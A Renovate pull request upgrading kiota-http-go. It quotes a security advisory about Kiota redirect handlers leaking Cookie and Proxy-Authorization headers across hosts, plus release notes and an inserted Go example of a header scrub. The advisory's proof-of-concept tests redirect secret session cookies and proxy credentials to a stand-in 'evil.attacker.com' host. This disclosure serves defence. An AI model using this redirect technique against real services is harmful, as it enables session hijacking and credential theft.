
Update module github.com/microsoft/kiota-http-go to v1 [SECURITY] #419

Open

renovate[bot] wants to merge 1 commit into main from renovate/go-github.com-microsoft-kiota-http-go-vulnerability

Conversation

renovate Bot (Contributor) commented May 8, 2026

This PR contains the following updates:

Package Change
github.com/microsoft/kiota-http-go v0.16.1 -> v1.5.5

Kiota abstractions RedirectHandler leaks Cookie/Proxy-Authorization headers on cross-host redirect

CVE-2026-44503 / GHSA-7j59-v9qr-6fq9

More information

Details

Summary

The RedirectHandler middleware in microsoft/kiota-java (com.microsoft.kiota:microsoft-kiota-http-okHttp v1.9.0) and other Kiota libraries fails to strip sensitive HTTP headers when following 3xx redirects to a different host or scheme.

This vulnerability is present in the RedirectHandlers for:

https://github.com/microsoft/kiota-dotnet
https://github.com/microsoft/kiota-java
https://github.com/microsoft/kiota-python
https://github.com/microsoft/kiota-typescript
https://github.com/microsoft/kiota-http-go

Details

Only the Authorization header is removed; Cookie, Proxy-Authorization, and all custom headers are forwarded to the redirect target.

This is the default middleware in every kiota-java HTTP client created via KiotaClientFactory.create(). OkHttp's built-in redirect handler (which handles this correctly) is explicitly disabled at line 63 of KiotaClientFactory.java in favor of kiota's broken implementation.

Vulnerable code in RedirectHandler.java lines 107-116 (getRedirect method) in versions 1.9.0 and earlier:

```java
boolean sameScheme = locationUrl.scheme().equalsIgnoreCase(requestUrl.scheme());
boolean sameHost = locationUrl.host().toString().equalsIgnoreCase(requestUrl.host().toString());
if (!sameScheme || !sameHost) {
    requestBuilder.removeHeader("Authorization");
    // BUG: Cookie, Proxy-Authorization, and all other headers are NOT removed
}
```
PoC

  1. Clone the repository:

```shell
git clone --depth 1 https://github.com/microsoft/kiota-java.git
cd kiota-java
```

  2. Create the PoC test file at:
     components/http/okHttp/src/test/java/com/microsoft/kiota/http/middleware/SecurityPoC.java

With this content:

```java
package com.microsoft.kiota.http.middleware;

import static org.junit.jupiter.api.Assertions.*;

import com.microsoft.kiota.http.KiotaClientFactory;
import okhttp3.*;
import okhttp3.mockwebserver.*;
import org.junit.jupiter.api.Test;

public class SecurityPoC {
    @Test
    void crossHostRedirectLeaksCookies() throws Exception {
        Request original = new Request.Builder()
                .url("http://trusted.example.com/api")
                .addHeader("Authorization", "Bearer token")
                .addHeader("Cookie", "session=SECRET")
                .addHeader("Proxy-Authorization", "Basic cHJveHk6cGFzcw==")
                .build();
        Response redirect = new Response.Builder()
                .request(original).protocol(Protocol.HTTP_1_1)
                .code(302).message("Found")
                .header("Location", "http://evil.attacker.com/steal")
                .body(ResponseBody.create("", MediaType.parse("text/plain")))
                .build();
        Request result = new RedirectHandler().getRedirect(original, redirect);
        assertNotNull(result);
        assertEquals("evil.attacker.com", result.url().host());
        assertNull(result.header("Authorization")); // stripped (good)
        assertEquals("session=SECRET", result.header("Cookie")); // LEAKED
        assertEquals("Basic cHJveHk6cGFzcw==", result.header("Proxy-Authorization")); // LEAKED
    }

    @Test
    void endToEndProof() throws Exception {
        var evil = new MockWebServer();
        evil.start();
        evil.enqueue(new MockResponse().setResponseCode(200));
        var trusted = new MockWebServer();
        trusted.start();
        trusted.enqueue(new MockResponse().setResponseCode(302)
                .setHeader("Location", evil.url("/steal")));
        OkHttpClient client = KiotaClientFactory.create(
                new Interceptor[]{new RedirectHandler()}).build();
        client.newCall(new Request.Builder().url(trusted.url("/api"))
                .addHeader("Cookie", "session=SECRET").build()).execute();
        trusted.takeRequest();
        RecordedRequest captured = evil.takeRequest();
        assertEquals("session=SECRET", captured.getHeader("Cookie")); // LEAKED to evil server
        evil.shutdown();
        trusted.shutdown();
    }
}
```
  3. Run the tests:

```shell
./gradlew :components:http:okHttp:test --tests "com.microsoft.kiota.http.middleware.SecurityPoC"
```

  4. Result: BUILD SUCCESSFUL, 2 tests passed, 0 failures.
     Both tests confirm Cookie and Proxy-Authorization headers are sent to the attacker's server on cross-host redirect.

Impact

The kiota-java bug is more severe because it leaks ALL sensitive headers simultaneously (Cookie + Proxy-Authorization + custom auth headers), not just one type.

Attack scenario: An attacker who can trigger a cross-origin redirect from a trusted API (via open redirect, MITM, or DNS rebinding) captures the victim's session cookies, proxy credentials, and API keys from the redirected request.

Impact:

  • Session hijacking via leaked Cookie headers
  • Corporate proxy credential theft via leaked Proxy-Authorization
  • API key theft via leaked custom auth headers (X-API-Key, etc.)

All consumers of kiota-java are affected, including Microsoft Graph SDK for Java.

Severity

  • CVSS Score: 7.0 / 10 (High)
  • Vector String: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


Release Notes

microsoft/kiota-http-go (github.com/microsoft/kiota-http-go)

v1.5.5

Compare Source

Bug Fixes
  • adding sensitive headers scrub function (fba6ba4)
  • adding sensitive headers scrub function (39fa46c)
  • adding sensitive headers scrub function (ce4f0dc)
  • adding sensitive headers scrub function (e68b9e1)

v1.5.4

Compare Source

Bug Fixes

v1.5.3

Compare Source

Bug Fixes
  • adding middleware with options errors with "unsupported option type" (beeb32d)

v1.5.2

Compare Source

Bug Fixes
  • removes common go dependency (42c2137)
  • removes common go dependency (df1bf28)

v1.5.1

Compare Source

Bug Fixes
  • upgrades common go dependency to solve trimming issues (4a57c46)
  • upgrades common go dependency to solve trimming issues (d1aa07f)

v1.5.0

Compare Source

Features
  • upgrades required go version from go1.18 to go 1.22 (2e60cd5)

v1.4.7

Compare Source

Changed
  • Updated HTTP span attributes to comply with updated OpenTelemetry semantic conventions. #182

v1.4.6

Compare Source

Changed
  • Fixed a bug where headers inspection handler would fail upon receiving an error.

v1.4.5

Compare Source

Changed
  • Fixed a bug in compression middleware which caused empty body to send on retries

v1.4.4

Compare Source

Changed
  • Added http.request.resend_delay as a span attribute for the retry handler
  • Changed the http.retry_count span attribute to http.request.resend_count to conform to OpenTelemetry specs.

v1.4.3

Compare Source

Changed
  • Fixed a bug to prevent double request compression by the compression handler.

v1.4.2

Compare Source

Changed
  • Prevent compression if Content-Range header is present.
  • Fix bug which leads to a missing Content-Length header.

v1.4.1

Compare Source

Changed
  • Allow custom response handlers to return nil result values.

v1.4.0

Compare Source

  • Support retry after as a date.

v1.3.3

Compare Source

  • Fix bug where overriding http.DefaultTransport with an implementation other than http.Transport would result in an interface conversion panic

v1.3.2

Compare Source

Changed
  • Fix bug with headers inspection handler using wrong key.

v1.3.1

Compare Source

Changed
  • Fix bug that resulted in the error "content is empty" being returned instead of HTTP status information if the request returned no content and an unsuccessful status code.

v1.3.0

Compare Source

Added
  • Added support to override default middleware with function GetDefaultMiddlewaresWithOptions.

v1.2.1

Compare Source

Changed
  • Fix bug passing no timeout in client as 0 timeout in context.

v1.2.0

Compare Source

Added
  • Adds support for XXX status code.

v1.1.2

Compare Source

Changed
  • Changed the code by replacing ioutil.ReadAll and ioutil.NopCloser with io.ReadAll and io.NopCloser, respectively, due to their deprecation.

v1.1.1

Compare Source

Added
  • Added response headers and status code to returned error in throwIfFailedResponse.

v1.1.0

Compare Source

Added
  • Added headers inspection middleware and option.

v1.0.1

Compare Source

Changed
  • Bug Fix: Update Host for Redirect URL in go client.

v1.0.0

Compare Source

Changed
  • GA Release.

v0.17.0

Compare Source

Added
  • Adds Response Headers to the ApiError returned on Api requests errors.

v0.16.2

Compare Source

Added
  • Exit retry handler earlier if context is done.
  • Adds exported method ReplacePathTokens that can be used to process url replacement logic globally.

Configuration

📅 Schedule: (UTC)

  • Branch creation
    • ""
  • Automerge
    • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.


This PR was generated by Mend Renovate. View the repository job log.
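The scrub that the advisory calls for, written in Go as an added example (this is not code from kiota-http-go or any other Kiota library, and it makes no claim about how the v1.5.5 fix is implemented): a redirect helper that clones the original request's headers and, whenever the scheme or host of the Location target differs from the original, drops Authorization, Cookie, Proxy-Authorization and a representative custom auth header. The `sensitiveHeaders` list, the `sameOrigin`, `redirectRequest` and `forwardedHeaders` functions, the `X-API-Key` header name and the host `other.example.net` are all assumptions of this example; the request values are constructed after the advisory's PoC.

```go
package main

import (
	"fmt"
	"net/http"
	"net/url"
	"sort"
	"strings"
)

// sensitiveHeaders lists headers that must not follow a redirect to a
// different scheme or host. Authorization, Cookie and Proxy-Authorization
// are the headers named in the advisory; X-API-Key stands in for the
// "custom auth headers" it mentions and is an assumption of this example.
var sensitiveHeaders = []string{
	"Authorization",
	"Proxy-Authorization",
	"Cookie",
	"X-API-Key",
}

// sameOrigin reports whether two URLs share scheme and host, compared
// case-insensitively like the Java check quoted in the advisory. url.URL.Host
// keeps an explicit port, so http://a.example and http://a.example:8080 count
// as different origins, which is the safer reading.
func sameOrigin(a, b *url.URL) bool {
	return strings.EqualFold(a.Scheme, b.Scheme) && strings.EqualFold(a.Host, b.Host)
}

// redirectRequest builds the follow-up request for a 3xx Location value.
// Headers are cloned from the original request so the original is left
// untouched; on a cross-origin hop every sensitiveHeaders entry is removed.
// Relative Location values are resolved against the original URL. The hop is
// modelled as a body-less GET, which is how a 302/303 is normally followed.
func redirectRequest(orig *http.Request, location string) (*http.Request, error) {
	target, err := orig.URL.Parse(location)
	if err != nil {
		return nil, err
	}
	next, err := http.NewRequest(http.MethodGet, target.String(), nil)
	if err != nil {
		return nil, err
	}
	next.Header = orig.Header.Clone()
	if !sameOrigin(orig.URL, target) {
		for _, name := range sensitiveHeaders {
			next.Header.Del(name)
		}
	}
	return next, nil
}

// forwardedHeaders returns the sorted names of the headers a request would
// send, which is what a test or reviewer wants to inspect after a redirect.
func forwardedHeaders(req *http.Request) []string {
	names := make([]string, 0, len(req.Header))
	for name := range req.Header {
		names = append(names, name)
	}
	sort.Strings(names)
	return names
}

func main() {
	// Constructed request modelled on the advisory's PoC (values are not real).
	orig, _ := http.NewRequest(http.MethodGet, "http://trusted.example.com/api", nil)
	orig.Header.Set("Authorization", "Bearer token")
	orig.Header.Set("Cookie", "session=SECRET")
	orig.Header.Set("Proxy-Authorization", "Basic cHJveHk6cGFzcw==")
	orig.Header.Set("Accept", "application/json")

	// Same-origin hop keeps every header; cross-host hop keeps only Accept.
	for _, loc := range []string{"/v2/api", "http://other.example.net/steal"} {
		next, err := redirectRequest(orig, loc)
		if err != nil {
			panic(err)
		}
		fmt.Printf("redirect to %s forwards %v\n", next.URL, forwardedHeaders(next))
	}
}
```

Go's own `net/http` client already drops Authorization, Cookie and similar headers when a redirect leaves the original domain, so this matters for the case the advisory describes: a hand-rolled redirect middleware that replaces the platform's redirect logic (as the Kiota handlers do with OkHttp's) has to do the scrub itself, and has to do it for every credential-bearing header rather than Authorization alone.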

renovate Bot (Contributor, Author) commented May 8, 2026

ℹ️ Artifact update notice

File name: go.mod

In order to perform the update(s) described in the table above, Renovate ran the go get command, which resulted in the following additional change(s):

  • 8 additional dependencies were updated
  • The go directive was updated for compatibility reasons

Details:

Package Change
go 1.21.13 -> 1.23.0
github.com/go-logr/logr v1.4.1 -> v1.4.2
github.com/google/go-cmp v0.5.9 -> v0.7.0
github.com/google/uuid v1.3.0 -> v1.6.0
github.com/hashicorp/go-retryablehttp v0.7.7 -> v0.7.7
github.com/microsoft/kiota-abstractions-go v0.19.0 -> v1.9.2
github.com/stretchr/testify v1.9.0 -> v1.10.0
go.opentelemetry.io/otel v1.14.0 -> v1.35.0
go.opentelemetry.io/otel/trace v1.14.0 -> v1.35.0
